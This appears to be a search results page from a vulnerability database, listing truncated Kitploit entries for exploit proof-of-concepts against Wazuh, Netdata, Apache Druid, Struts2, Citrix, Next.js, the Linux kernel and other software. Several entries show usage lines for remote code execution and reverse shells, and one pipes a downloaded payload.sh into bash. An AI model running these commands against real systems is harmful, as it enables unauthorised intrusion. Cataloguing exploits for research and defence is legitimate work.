Lucene search
+L

12883 matches found

Kitploit
Kitploit
added 2026/09/06 2:37 p.m.9 views

CVE-2021-26814

CVE-2021-26814 A simple python PoC to exploit CVE-2021-26814 and gain RCE on Wazuh Manager v.4.0.0-4.0.3 through the API service. To run it, simply make the .py script executable and launch it with the required parameters. root@kitploit: PoC.py -h -user USERNAME -pwd PASSWORD -lip SRCIP -lport...

8.8CVSS7.8AI score0.08746EPSS
SaveExploits4References1
Kitploit
Kitploit
added 2026/09/06 2:34 p.m.6 views

CVE-2023-46818

CVE-2023-46818 PoC This is a python implemntation of the PoC provided by Egidio Romano aka EgiX Over here, this exploit will prompt you a webshell, for a fully interactive shell execute a command and send yourself a reveseshell. Usage root@kitploit: python exploit.py http://localhost username...

7.2CVSS7.3AI score0.13784EPSS
SaveExploits14
Kitploit
Kitploit
added 2026/09/06 2:27 p.m.5 views

CVE-2024-32019-poc

CVE-2024-32019-poc Netdata ndsudo PoC Build the binary: root@kitploit: go build -ldflags "-s -w" -o nvme poc.go upx nvme Run the bash script: root@kitploit: bash exploit.sh In target machine run in a writable directory: root@kitploit: curl http://:8000/payload.sh | bash It will automatically...

8.8CVSS7.9AI score0.01165EPSS
SaveExploits15References1
Kitploit
Kitploit
added 2026/09/06 2:24 p.m.5 views

CVE-2019-3980

CVE-2019-3980 CVE-2019-3980 exploit written in win32/c++ openssl dependency. Port of https://github.com/tenable/poc/blob/master/Solarwinds/Dameware/dwrcsdwDrvInstrce.py Instructions This PoC requires staticly linked openssl libraries. Place openssl includes in thirdparty\include\openssl and libs ...

10CVSS8.2AI score0.05138EPSS
SaveExploits4References1
Kitploit
Kitploit
added 2026/09/06 2:19 p.m.7 views

RCE-PoC-CVE-2021-25646

CVE-2021-25646 Proof-of-Concept Go Version Overview This repository contains a proof-of-concept PoC exploit for CVE-2021-25646, a critical remote code execution vulnerability in Apache Druid. The exploit is written in Go and allows for interactive command injection via the terminal. Features...

9CVSS8.4AI score0.99001EPSS
SaveExploits8
Kitploit
Kitploit
added 2026/09/06 2:18 p.m.7 views

cve-2018-12386

Firefox Sandboxed RCE Exploit CVE-2018-12386 Here is a simple exploit for the vulnerability CVE-2018-12386 found by Niklas Baumstark, Samuel Groß and Bruno Keith. This is mostly a PoC I did for fun, there is no sandbox bypass and it will only work on a given Linux setup where the offsets used by...

8.1CVSS7.9AI score0.13417EPSS
SaveExploits2
Kitploit
Kitploit
added 2026/09/06 2:12 p.m.5 views

struts2-jakarta-inject

POC Exploit for CVE-2017-5638 Only use this exploit on systems you own or have explicit rights to test Installation If you have go already installed on your computer, go get is the way to go go get github.com/Greynad/struts2-jakarta-inject Usage Single command execution struts2-jakarta-inject -u ...

10CVSS8.2AI score0.99999EPSS
SaveExploits46
Kitploit
Kitploit
added 2026/09/06 1:51 p.m.7 views

CVE-2023-6019

Python POC Derived from Authors POC Usage python3 CVE-2023-6019.py -t 192.168.191.37 -p 9000 -l 192.168.45.xxx -lp 4444...

9.8CVSS7.7AI score0.7463EPSS
SaveExploits18
Kitploit
Kitploit
added 2026/09/06 1:39 p.m.7 views

CVE-2013-3827

CVE-2013-3827 Quick PoC checker for common configurations that might be available via directory traversal due to CVE-2013-3827 Usage: 1. Modify the contents of traversal.py to match your needs 2. python3 traversal.py...

5CVSS5.9AI score0.32441EPSS
SaveExploits1
Kitploit
Kitploit
added 2026/09/06 1:17 p.m.5 views

Joomla-CVE-2015-8562-PHP-POC

Joomla-CVE-2015-8562-PHP-POC A proof of concept for Joomla's CVE-2015-8562 vulnerability Intro This PoC is a near 1:1 copy of Gary's python implementation hosted at exploit-db. Use it It's very easy to install: root@kitploit: git clone...

7.5CVSS7.9AI score0.98283EPSS
SaveExploits16
Kitploit
Kitploit
added 2026/09/06 1:16 p.m.5 views

CVE-2023-27524

Badges License MIT Installation 1. Install Python3 and pip If you can't figure this out, you shouldn't really be using this...

9.8CVSS8AI score0.97405EPSS
SaveExploits19References1
Kitploit
Kitploit
added 2026/09/06 1:12 p.m.4 views

CitrixBleed-2-CVE-2025-5777

CitrixBleed-2-CVE-2025-5777 checker checker.py httphttpshost:port.txt result.txt 8 better you run OPENSSLCONF=./openssl.cnf checker.py httphttpshost:port.txt result.txt 8 poc this poc automatic exploit CVE-2025-5777 and check token exsist and after valid or not. poc.py -u https://target.example.c...

9.3CVSS8.2AI score0.99953EPSS
SaveExploits20
Kitploit
Kitploit
added 2026/09/06 1:02 p.m.5 views

Golang-CVE-2021-44077-POC

Golang-CVE-2021-44077-POC This exploit is an unauthenticated RCE in Zoho ManageEngine ServiceDesk Plus msiexec.exe Then, run the exploit. go run CVE-2021-44077.go -u "http://192.168.1.3:8080/" -f "/msiexec.exe" -u is the vulnerable URL -f is your malicious file...

9.8CVSS8.4AI score0.93298EPSS
SaveExploits6
Kitploit
Kitploit
added 2026/09/06 1:01 p.m.5 views

CVE-2021-37832

CVE-2021-37832 CVE 2021-37832 poc usage : python3 CVE-2021-37832.py http://test.com...

9.8CVSS8.1AI score0.04102EPSS
SaveExploits3
Kitploit
Kitploit
added 2026/09/06 12:56 p.m.7 views

2022-LPE-UAF

2022-LPE-UAF 安全研究人员在Linux内核中发现了3个漏洞,本地攻击者可能利用这些漏洞提升权限并在一定程度上执行恶意代码。概念验证代码已公开,从而增加了在真实环境中被利用的可能性。 https://zplin.me/papers/DirtyCred-Zhenpeng.pdf...

5.9AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/06 12:53 p.m.5 views

Gui-poc-test

Gui-poc-test A testing tool for CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432 A graphical vulnerability detection and exploitation tool for these three vulnerabilities. Notes 1. Running the jar requires Java 8 2. For single target, not suitable for multi-IP...

7.3AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/06 12:01 p.m.5 views

CVE-2025-55182

CVE-2025-55182 Next.js RCE 利用工具 🚀 这是一个针对 Next.js React Server Components CVE-2025-55182 远程代码执行 RCE 漏洞的自动化概念验证 PoC 工具。 该工具集成了 交互式 Shell 、智能协议识别 以及 多线程批量扫描 功能,专为安全研究人员和渗透测试人员设计,旨在快速验证和利用该漏洞。 ⚠️ 免责声明 :本工具仅供网络安全教育和已获得授权的安全测试使用。严禁将其用于任何未授权的攻击行为。使用者需自行承担因使用本工具而产生的所有法律责任。 ✨ 核心功能 交互式 Shell 模式...

10CVSS7.5AI score0.99802EPSS
SaveExploits390
Kitploit
Kitploit
added 2026/09/06 10:47 a.m.5 views

CVE-2024-1086

CVE-2024-1086 Universal local privilege escalation Proof-of-Concept exploit for CVE-2024-1086, working on most Linux kernels between v5.14 and v6.6, including Debian, Ubuntu, and KernelCTF. The success rate is 99.4% in KernelCTF images. Affected versions The exploit affects versions from includin...

7.8CVSS7.1AI score0.28058EPSS
SaveExploits16References1
Kitploit
Kitploit
added 2026/09/06 10:44 a.m.5 views

CVE-2023-0386-go-poc

Go PoC of CVE-2023-0386 ./main /tmp/fuse Will run the program and create a fuse mount on "/tmp/fuse" directory. Expects you've compiled the shell in the root directory with a name of "shell" by default. After you've run the program, there should be an executable binary in the "/tmp/ovlmerged/"...

7.8CVSS7.1AI score0.0788EPSS
SaveExploits15
Kitploit
Kitploit
added 2026/09/06 10:43 a.m.10 views

CVE-2017-7679

CVE-2017-7679 POC SCRIPT POR Lord0x | LordWare LordWare CVE CyberSec Telegram: https://t.me/OfficialLordWare...

9.8CVSS7.3AI score0.39341EPSS
SaveExploits3
Rows per page
Query Builder